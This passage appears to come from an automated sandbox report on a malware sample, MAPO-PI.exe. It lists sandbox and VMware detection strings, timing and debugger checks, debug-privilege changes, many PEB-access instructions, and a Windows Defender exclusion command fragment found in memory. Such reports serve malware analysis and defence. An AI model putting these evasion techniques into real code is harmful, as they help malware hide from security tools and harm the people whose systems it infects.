          Source: C:\Users\user\Desktop\MAPO-PI.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.278762456.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.273464193.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.272236107.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.258291932.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h]3_2_018BC182
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA185 mov eax, dword ptr fs:[00000030h]3_2_018CA185
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2990 mov eax, dword ptr fs:[00000030h]3_2_018C2990
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]3_2_018C61A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]3_2_018C61A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]3_2_019151BE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]3_2_019151BE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]3_2_019151BE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]3_2_019151BE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]3_2_019549A4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]3_2_019549A4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]3_2_019549A4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]3_2_019549A4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019169A6 mov eax, dword ptr fs:[00000030h]3_2_019169A6
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]3_2_0189B1E1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]3_2_0189B1E1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]3_2_0189B1E1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019241E8 mov eax, dword ptr fs:[00000030h]3_2_019241E8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]3_2_01899100
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]3_2_01899100
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]3_2_01899100
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]3_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]3_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]3_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]3_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B4120 mov ecx, dword ptr fs:[00000030h]3_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]3_2_018C513A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]3_2_018C513A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]3_2_018BB944
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]3_2_018BB944
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C962 mov eax, dword ptr fs:[00000030h]3_2_0189C962
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]3_2_0189B171
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]3_2_0189B171
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899080 mov eax, dword ptr fs:[00000030h]3_2_01899080
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]3_2_01913884
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]3_2_01913884
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D90AF mov eax, dword ptr fs:[00000030h]3_2_018D90AF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]3_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CF0BF mov ecx, dword ptr fs:[00000030h]3_2_018CF0BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]3_2_018CF0BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]3_2_018CF0BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]3_2_0192B8D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0192B8D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]3_2_0192B8D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]3_2_0192B8D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]3_2_0192B8D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]3_2_0192B8D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018958EC mov eax, dword ptr fs:[00000030h]3_2_018958EC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]3_2_018940E1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]3_2_018940E1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]3_2_018940E1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h]3_2_018BB8E4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h]3_2_018BB8E4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]3_2_01964015
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]3_2_01964015
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]3_2_01917016
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]3_2_01917016
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]3_2_01917016
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]3_2_018AB02A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]3_2_018AB02A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]3_2_018AB02A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]3_2_018AB02A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]3_2_018C002D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]3_2_018C002D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]3_2_018C002D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]3_2_018C002D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]3_2_018C002D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]3_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]3_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]3_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]3_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]3_2_018B0050
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]3_2_018B0050
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961074 mov eax, dword ptr fs:[00000030h]3_2_01961074
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952073 mov eax, dword ptr fs:[00000030h]3_2_01952073
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]3_2_018A1B8F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]3_2_018A1B8F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h]3_2_0194D380
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h]3_2_018C2397
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h]3_2_018CB390
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195138A mov eax, dword ptr fs:[00000030h]3_2_0195138A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]3_2_018C4BAD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]3_2_018C4BAD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]3_2_018C4BAD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h]3_2_01965BA5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]3_2_019153CA
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]3_2_019153CA
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h]3_2_018BDBE9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h]3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h]3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov eax, dword ptr fs:[00000030h]3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195131B mov eax, dword ptr fs:[00000030h]3_2_0195131B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h]3_2_0189DB40
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h]3_2_01968B58
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h]3_2_0189F358
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h]3_2_0189DB60
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]3_2_018C3B7A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]3_2_018C3B7A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]3_2_018CD294
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]3_2_018CD294
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]3_2_018952A5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]3_2_018AAAB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]3_2_018AAAB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h]3_2_018CFAB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h]3_2_018C2ACB
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h]3_2_018C2AE4
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h]3_2_018A8A0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h]3_2_018B3A1C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]3_2_01895210
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]3_2_0189AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]3_2_0189AA16
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]3_2_018D4A2C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]3_2_018D4A2C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]3_2_018BA229
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h]3_2_0195EA55
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01924257 mov eax, dword ptr fs:[00000030h]3_2_01924257
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]3_2_01899240
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]3_2_0194B260
